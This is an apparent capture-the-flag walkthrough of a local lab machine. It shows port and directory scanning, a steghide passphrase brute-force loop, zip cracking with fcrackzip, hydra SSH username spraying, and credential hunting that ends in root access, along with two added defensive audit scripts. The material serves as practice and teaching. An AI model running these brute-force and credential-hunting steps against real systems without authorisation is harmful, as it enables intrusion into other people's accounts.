
export TARGET_IP=172.17.0.2
nmap -p0- $TARGET_IP
PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http

Web Server Enumeration

gobuster dir -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt
/scripts (Status: 301) [Size: 310] [--> http://$TARGET_IP/scripts/]

Investigating /scripts/ Directory

Further investigation of the /scripts/ directory revealed two elements:

  • put.php: A PHP file.
  • upload/: An empty directory.

Accessing http://$TARGET_IP/scripts/put.php directly via a web browser resulted in a 405 (Method Not Allowed) error. This is because the browser, by default, sends a GET request, and the file likely expects a different HTTP method.

  • The name put.php strongly suggests that this file might be designed to handle HTTP PUT requests.
  • The presence of an empty upload/ directory further reinforces the hypothesis that this setup could be intended for file uploads.

Confirm PUT Request Handling

curl -X PUT http://$TARGET_IP/scripts/put.php

Results

spongebob


The response "spongebob" is ambiguous. It could represent a username, a directory name, or another resource identifier. Further investigation is warranted.

Exploring Potential "spongebob" Resource

Based on the response, we hypothesize that "spongebob" might represent a directory or endpoint. We can test this by directly accessing it via the web server.

Visiting http://$TARGET_IP/spongebob/ in a web browser reveals a directory listing.

Contents of /spongebob/

  • upload/: A subdirectory containing a single image file, ohnorecallwin.jpg.

The presence of an image file raises the possibility of steganography or other data-hiding techniques being employed.

Analyzing ohnorecallwin.jpg

We begin by downloading the ohnorecallwin.jpg file for analysis.

wget http://$TARGET_IP/spongebob/upload/ohnorecallwin.jpg

Extracting Hidden Data with Steghide

We use steghide to attempt data extraction. Since we don't know the passphrase, we iterate through a password list:

#!/bin/bash

# Try each candidate passphrase from rockyou.txt until one extracts successfully.
while IFS= read -r password; do
    # -f overwrites any earlier partial output; stdout/stderr are silenced to keep the loop quiet
    if steghide extract -sf ohnorecallwin.jpg -p "$password" -f >/dev/null 2>&1; then
        echo "Success with password: $password"
        # Run the extraction once more with output visible to show what was written
        steghide extract -sf ohnorecallwin.jpg -p "$password" -f
        break   # Stop after the first successful extraction
    fi
done < /usr/share/wordlists/rockyou.txt

This script tries each password in rockyou.txt in turn. The output reveals the correct passphrase:

Success with password: spongebob
wrote extracted data to "seguro.zip".

Unzipping seguro.zip

The extracted seguro.zip archive is password-protected. We employ fcrackzip with rockyou.txt for a dictionary attack:

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt seguro.zip

This yields the password for seguro.zip:

PASSWORD FOUND!!!!: pw == chocolate

We then unzip the archive:

unzip seguro.zip
Archive: seguro.zip
[seguro.zip] secreto.txt password:
inflating: secreto.txt

Extracting the Hidden Message

The contents of secreto.txt are:

cat secreto.txt
aprendemos

The extracted message "aprendemos" is likely a credential or part of a credential, possibly a password or keyword.

SSH Username Enumeration and Exploitation

Given that port 22 (SSH) is open and we have a potential password ("aprendemos"), we attempt to enumerate valid SSH usernames using hydra.

Wordlist Selection:

For username enumeration, specialized wordlists are more effective than general password lists like rockyou.txt. The SecLists project (https://github.com/danielmiessler/SecLists) offers a comprehensive collection of username lists under the Usernames directory. In this case, we use xato-net-10-million-usernames.txt, which can be found in SecLists.

Hydra Command for Username Enumeration:

hydra -L ~/Downloads/xato-net-10-million-usernames.txt -p aprendemos ssh://172.17.0.2 -f

Results:

[22][ssh] host: 172.17.0.2   login: rosa   password: aprendemos

SSH Access and Initial Foothold

Using the discovered credentials, we establish an SSH connection:

ssh rosa@$TARGET_IP

Exploring Rosa's Home Directory:

Upon successful login, we find a directory with the unusual name "-" in rosa's home and enter it:

cd ./-

Listing the directory contents reveals numerous files and directories following a pattern:

ls
buscaelpass1 buscaelpass14 buscaelpass19 buscaelpass23 buscaelpass28 buscaelpass32 buscaelpass37 buscaelpass41 buscaelpass46 buscaelpass50 buscaelpass55 buscaelpass6 buscaelpass64 buscaelpass8
buscaelpass10 buscaelpass15 buscaelpass2 buscaelpass24 buscaelpass29 buscaelpass33 buscaelpass38 buscaelpass42 buscaelpass47 buscaelpass51 buscaelpass56 buscaelpass60 buscaelpass65 buscaelpass9
buscaelpass11 buscaelpass16 buscaelpass20 buscaelpass25 buscaelpass3 buscaelpass34 buscaelpass39 buscaelpass43 buscaelpass48 buscaelpass52 buscaelpass57 buscaelpass61 buscaelpass66 creararch.sh
buscaelpass12 buscaelpass17 buscaelpass21 buscaelpass26 buscaelpass30 buscaelpass35 buscaelpass4 buscaelpass44 buscaelpass49 buscaelpass53 buscaelpass58 buscaelpass62 buscaelpass67
buscaelpass13 buscaelpass18 buscaelpass22 buscaelpass27 buscaelpass31 buscaelpass36 buscaelpass40 buscaelpass45 buscaelpass5 buscaelpass54 buscaelpass59 buscaelpass63 buscaelpass7

We also find a script named creararch.sh.

Analyzing creararch.sh:

cat creararch.sh

The script's contents are:

#!/bin/bash

# Look for directories whose names start with "busca"
for directorio in busca*; do
    # Check that the directory exists
    if [ -d "$directorio" ]; then
        # Create 50 files and fill each one with the placeholder content xx
        for i in {1..50}; do
            touch "$directorio/archivo$i" && echo "xxxxxx:xxxxxx" > "$directorio/archivo$i"
        done
        echo "Se crearon 50 archivos en $directorio"
    else
        echo "El directorio $directorio no existe"
    fi
done

This script creates 50 files within each directory starting with "busca" and fills them with the string "xxxxxx:xxxxxx".

Identifying Files with Anomalous Content

We can infer that one of these files might contain credentials or valuable information. We devise a script to identify files that deviate from the standard 14-byte size established by creararch.sh (or we could just filter out "xxxxxx:xxxxxx" using grep):

#!/bin/bash

# Loop through all "buscaelpass" directories
for dir in buscaelpass*; do
    # Loop through all files in each directory
    for file in "$dir"/*; do
        # Get the size of the file in bytes
        size=$(stat -c %s "$file")

        # Report any file whose size differs from the 14-byte template
        if [[ "$size" != "14" ]]; then
            echo "Found file with different size: $file"
            # Optionally, display the file content:
            cat "$file"
        fi
    done
done

Running the script reports a single file:

Found file with different size: buscaelpass33/archivo21
pedro:ell0c0
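As an added example (not part of the original walkthrough), here is a more general version of the triage above: instead of comparing sizes, it hashes the content of every file under the buscaelpass* directories and reports the ones that differ from the majority, which also catches a planted line that is exactly 14 bytes long. It builds a small constructed sample tree so it runs offline; paths are assumed to contain no whitespace.

```bash
#!/bin/bash
# Added example, not part of the original walkthrough. Hash the content of every file
# below the buscaelpass* directories and report the files whose content differs from
# the majority (the template written by creararch.sh). Unlike the size check on the
# page, this also catches a planted line of exactly 14 bytes. Assumes paths without
# whitespace.

find_outliers() {
    local base="$1" pairs common
    # "hash  path" for every regular file below the buscaelpass* directories
    pairs=$(find "$base"/buscaelpass* -type f -exec sha256sum {} +)
    # The most frequent hash is the template content
    common=$(printf '%s\n' "$pairs" | awk '{print $1}' | sort | uniq -c | sort -rn | awk 'NR==1 {print $2}')
    # Print the path of every file whose hash is not the template hash
    printf '%s\n' "$pairs" | awk -v c="$common" '$1 != c {print $2}'
}

# Constructed sample tree: 3 directories x 5 template files, plus one planted
# credential-looking line of the same 14-byte length as the template.
make_sample() {
    local base d i
    base=$(mktemp -d)
    for d in 1 2 3; do
        mkdir -p "$base/buscaelpass$d"
        for i in 1 2 3 4 5; do
            echo "xxxxxx:xxxxxx" > "$base/buscaelpass$d/archivo$i"
        done
    done
    echo "usr123:pwd123" > "$base/buscaelpass2/archivo4"   # constructed outlier, 14 bytes
    echo "$base"
}

sample=$(make_sample)
find_outliers "$sample"     # prints the path of buscaelpass2/archivo4
```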

Privilege Escalation: pedro

su pedro

In pedro's home directory, we find a hidden directory named "..." (three dots). Inside it we find a file called .misecreto:

cd .../
cat .misecreto
> Consegui el pass de juan y lo tengo escondido en algun lugar del sistema fuera de mi home.

Locating Juan's Password:

The note says that pedro obtained juan's password and hid it somewhere on the system outside his home directory. We therefore search the whole filesystem for files owned by pedro, filtering out the /proc noise:

find / -type f -user pedro 2>/dev/null | grep -v "proc"

This command reveals several files, including a particularly interesting one:

/home/pedro/.../.misecreto
/home/pedro/.bashrc
/home/pedro/.bash_logout
/home/pedro/.profile
/home/pedro/.cache/motd.legal-displayed
/var/mail/.pass_juan

We examine the contents of /var/mail/.pass_juan:

cat /var/mail/.pass_juan
ZWxwcmVzaW9uZXMK

The string "ZWxwcmVzaW9uZXMK" looks Base64-encoded; as it turns out, decoding it is not needed, and we switch to juan:

su juan

Privilege Escalation: juan

We find an interesting file named .ordenes_nuevas in juan's home directory:

cat .ordenes_nuevas
> Hola soy tu patron y me canse y me fui a casa te dejo mi pass en un lugar a mano consiguelo y acaba el trabajo.

This message suggests that juan's boss has left his password somewhere easily accessible.

We inspect juan's .bashrc file.

nano .bashrc

The file reveals an unusual alias:

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias pass='eljefe'
alias l='ls -CF'

The alias pass='eljefe' is highly suspicious, suggesting that "eljefe" might be a password.
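As an added example (not part of the original walkthrough), this bash script audits a shell rc file for alias definitions that look like stashed secrets rather than command shortcuts, which is exactly the pattern behind alias pass='eljefe'. The sample rc fragment is constructed from the alias block shown above.

```bash
#!/bin/bash
# Added example, not part of the original walkthrough. Report aliases whose name
# matches a credential keyword or whose value's first word does not resolve to a
# command on this host, as with alias pass='eljefe' above.

audit_aliases() {
    local rcfile="$1" line name value first lname reason
    grep -E '^[[:space:]]*alias[[:space:]]+[A-Za-z0-9_]+=' "$rcfile" | while IFS= read -r line; do
        name=$(printf '%s' "$line" | sed -E 's/^[[:space:]]*alias[[:space:]]+([A-Za-z0-9_]+)=.*/\1/')
        value=$(printf '%s' "$line" | sed -E 's/^[[:space:]]*alias[[:space:]]+[A-Za-z0-9_]+=//')
        value=${value#[\'\"]}; value=${value%[\'\"]}      # drop surrounding quotes
        first=${value%% *}                                # the command the alias would run
        lname=$(printf '%s' "$name" | tr 'A-Z' 'a-z')
        reason=""
        case "$lname" in
            *pass*|*pwd*|*secret*|*token*|*key*) reason="credential-like name" ;;
        esac
        if ! command -v "$first" >/dev/null 2>&1; then
            reason="${reason:+$reason; }'$first' is not a command"
        fi
        if [ -n "$reason" ]; then
            printf '%s\t%s\t%s\n' "$name" "$value" "$reason"
        fi
    done
    return 0
}

# Constructed sample: the alias block shown on the page, written to a temp file
make_sample_rc() {
    local rc
    rc=$(mktemp)
    cat > "$rc" <<'EOF'
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias pass='eljefe'
alias l='ls -CF'
EOF
    echo "$rc"
}

rc=$(make_sample_rc)
audit_aliases "$rc"    # reports only the "pass" alias with both reasons
```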

Privilege Escalation: root

We attempt to use the discovered password to escalate to root:

su root
Password: eljefe

The password "eljefe" is accepted, granting us root privileges:

id
uid=0(root) gid=0(root) groups=0(root)